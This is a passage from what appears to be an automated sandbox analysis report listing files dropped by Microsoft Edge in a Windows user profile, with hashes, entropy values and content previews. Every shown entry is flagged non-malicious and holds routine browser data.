                                                                                                                                                                                                                                                                                                  Size (bytes):345
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.184463419444166
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xg+q2P923oH+TcwtnG2tMsIFUt8U4XgqJZmw+U4XO3VkwO923oH+TcwtnG2tM2:Buv4Yebn9GFUt8UMJ/+U1F5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:C6B2688D1C5C189A4B77E4EFF3CD22C3
                                                                                                                                                                                                                                                                                                  SHA1:C40225358871B354D444BB39A1499B5F34A9E1D3
                                                                                                                                                                                                                                                                                                  SHA-256:299D4AEF23814D0E1355C4C22ACBE0D0F0486B71C774439589D100D678EFB7B5
                                                                                                                                                                                                                                                                                                  SHA-512:36C27A54FBC160442A7697245B1145D64125FC89B19B2CA1946C04900A0C1AE66B2077A43121934534FB3EE964C1DD59012F8EECD795524A0F30E0318D1E7519
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.582 4c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:01:21.583 4c8 Recovering log #3.2024/12/27-01:01:21.584 4c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.613265655007497
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j4nr3ppuLnrhmL:TO8D4jJ/6Up+0nzmnC
                                                                                                                                                                                                                                                                                                  MD5:929D5D9017E3B6F4A4D2A2F24AE53124
                                                                                                                                                                                                                                                                                                  SHA1:6B187E188FB2EC4E11B009EB55F00279EC3C3487
                                                                                                                                                                                                                                                                                                  SHA-256:9BFD94A97C2AEF0C5ECF46A6DC1C5D68DEAAD1A460E1E200BFEF8151E51CCE51
                                                                                                                                                                                                                                                                                                  SHA-512:2FB7B5EB934B972759770036F9C55F31880B1A81BA71B35704D507CAB1C94A8A040EE1F543F4CD1D7CCC715F4EDB135FADF52FFB940F8F7AC9A6168FF619B876
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354135659378303
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:kA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:kFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                  MD5:1BA354C756837C0C12B1CE122024AA3D
                                                                                                                                                                                                                                                                                                  SHA1:31B0AC678F4493BFDAEAC634681298A0B52365CF
                                                                                                                                                                                                                                                                                                  SHA-256:7F0681D3E5A9089F353438C4030997E82B7C57D0193FADE34AFA607C55C755DD
                                                                                                                                                                                                                                                                                                  SHA-512:47E74E604F44B77A0F08D0B9375E751B9319BCB26AEBB712A5D0786917A1565570FA60320684A796E7CFD498CD3D717F8C9F4DB2E09DA13F9188416BAA11344B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1...=q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379752889601783..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):311
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138679595223296
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XZymRq1923oH+Tcwtk2WwnvB2KLl34XPTq2P923oH+Tcwtk2WwnvIFUv:BCymxYebkxwnvFLpSv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                  MD5:D7A6B7DE89D270618081597667697F7A
                                                                                                                                                                                                                                                                                                  SHA1:EE62B0DE02F2E8C941D3B72D9CE3871CB0AA953A
                                                                                                                                                                                                                                                                                                  SHA-256:EDB875158AACDBE18FEB24B5968F541242EA753D4F905B5A03E415A1A89C112A
                                                                                                                                                                                                                                                                                                  SHA-512:E0AA2828035EF6F28A3DA5C8693AE1C69B9E84CCE21D405064884896980AEF3AEADBB3009072636A2A738B45F851D9A8F94CAE4BDAD4AE700B1AFC160C74FB9E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.123 1c90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-01:01:26.147 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324623988271837
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RK:C1gAg1zfvy
                                                                                                                                                                                                                                                                                                  MD5:73272BC543527C49AA1BA50B340472BE
                                                                                                                                                                                                                                                                                                  SHA1:63EAAADE9DAA8B440FDC210C5BBE5747DDD72F82
                                                                                                                                                                                                                                                                                                  SHA-256:D65B923E5CCA8A2E787CBB679A5987CB3057CB40EC1CCF4CA93A70E251CA2F42
                                                                                                                                                                                                                                                                                                  SHA-512:3B190E4FE4275DEE4FE32EB2819BFF1FAE29F5D115105B203B545F8D1CBBD145C41B34D41376C7829842DB8060637DFEB6EF705024D7C33060F908ED4201139E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.146969706469028
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X4U8+q2P923oH+Tcwt8aPrqIFUt8U4XWWZmw+U4XdVkwO923oH+Tcwt8amLJ:BBN+v4YebL3FUt8UBW/+UcV5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:47EA98A9C562939DFA7D52D55591E370
                                                                                                                                                                                                                                                                                                  SHA1:168D19F035DA982C87319CD388A17B5A4D4F1E03
                                                                                                                                                                                                                                                                                                  SHA-256:1B88BD695978870FE71830D3DAEBD211AFFA6FD813F8E77AC3A9ECF489543095
                                                                                                                                                                                                                                                                                                  SHA-512:5CCFD403CA243611F1194DEB5514F50F0A5E3C0B3DBE65A796DB50ED8B092CB48EBE447BF766A6D93FDC1F69335C12B932DA77EEF38B32DC5A466B51A201BE3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.529 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:01:21.533 195c Recovering log #3.2024/12/27-01:01:21.533 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.146969706469028
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X4U8+q2P923oH+Tcwt8aPrqIFUt8U4XWWZmw+U4XdVkwO923oH+Tcwt8amLJ:BBN+v4YebL3FUt8UBW/+UcV5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:47EA98A9C562939DFA7D52D55591E370
                                                                                                                                                                                                                                                                                                  SHA1:168D19F035DA982C87319CD388A17B5A4D4F1E03
                                                                                                                                                                                                                                                                                                  SHA-256:1B88BD695978870FE71830D3DAEBD211AFFA6FD813F8E77AC3A9ECF489543095
                                                                                                                                                                                                                                                                                                  SHA-512:5CCFD403CA243611F1194DEB5514F50F0A5E3C0B3DBE65A796DB50ED8B092CB48EBE447BF766A6D93FDC1F69335C12B932DA77EEF38B32DC5A466B51A201BE3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.529 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:01:21.533 195c Recovering log #3.2024/12/27-01:01:21.533 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.173926215228176
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XmTD+q2P923oH+Tcwt865IFUt8U4XQWZmw+U4XnVkwO923oH+Tcwt86+ULJ:BtTD+v4Yeb/WFUt8UvW/+UqV5LYeb/+e
                                                                                                                                                                                                                                                                                                  MD5:0F7FCC1F18748D23B44E42A046981DB9
                                                                                                                                                                                                                                                                                                  SHA1:55B6F02CF98BC9E6ACAFDD36F4CF961B31D62C63
                                                                                                                                                                                                                                                                                                  SHA-256:7D447CEB690487A4D2B23FC6093EAADA148B619D2D169DBF387A5C7DC7B55356
                                                                                                                                                                                                                                                                                                  SHA-512:C9FD5054F0D422A93058A889804E966FE67658F78F75E4CB5A1FA4E9EFAD5417B0464F93C32FEA3C9AE0347C033B299A6B49AAA486D5C3BC0B8EC1A430995753
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.538 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:01:21.539 195c Recovering log #3.2024/12/27-01:01:21.539 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.173926215228176
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XmTD+q2P923oH+Tcwt865IFUt8U4XQWZmw+U4XnVkwO923oH+Tcwt86+ULJ:BtTD+v4Yeb/WFUt8UvW/+UqV5LYeb/+e
                                                                                                                                                                                                                                                                                                  MD5:0F7FCC1F18748D23B44E42A046981DB9
                                                                                                                                                                                                                                                                                                  SHA1:55B6F02CF98BC9E6ACAFDD36F4CF961B31D62C63
                                                                                                                                                                                                                                                                                                  SHA-256:7D447CEB690487A4D2B23FC6093EAADA148B619D2D169DBF387A5C7DC7B55356
                                                                                                                                                                                                                                                                                                  SHA-512:C9FD5054F0D422A93058A889804E966FE67658F78F75E4CB5A1FA4E9EFAD5417B0464F93C32FEA3C9AE0347C033B299A6B49AAA486D5C3BC0B8EC1A430995753
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.538 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:01:21.539 195c Recovering log #3.2024/12/27-01:01:21.539 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0887016879249325
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X/SE9+q2P923oH+Tcwt8NIFUt8U4XXWZmw+U4XUVkwO923oH+Tcwt8+eLJ:BcSi+v4YebpFUt8UiW/+U3V5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:B049F756F5F38C066F339051889C26C0
                                                                                                                                                                                                                                                                                                  SHA1:2F23C58F91ED7E98BC86A71502547EB2C48775BE
                                                                                                                                                                                                                                                                                                  SHA-256:AC738EBE6935E6520986314CCAA74C7CDD2DF54C54291D7DEDCBEA3D488B1191
                                                                                                                                                                                                                                                                                                  SHA-512:F71DB20EAB364CC4C2919E09582CC5631A89A66F2EDCF7F9FC489493C68671F4CF55D8DF521CF88D5E5CA11A66F93838934CD797F023FA3EDFC3A8B22EEE27BD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.323 4cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:01:22.324 4cc Recovering log #3.2024/12/27-01:01:22.326 4cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0887016879249325
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X/SE9+q2P923oH+Tcwt8NIFUt8U4XXWZmw+U4XUVkwO923oH+Tcwt8+eLJ:BcSi+v4YebpFUt8UiW/+U3V5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:B049F756F5F38C066F339051889C26C0
                                                                                                                                                                                                                                                                                                  SHA1:2F23C58F91ED7E98BC86A71502547EB2C48775BE
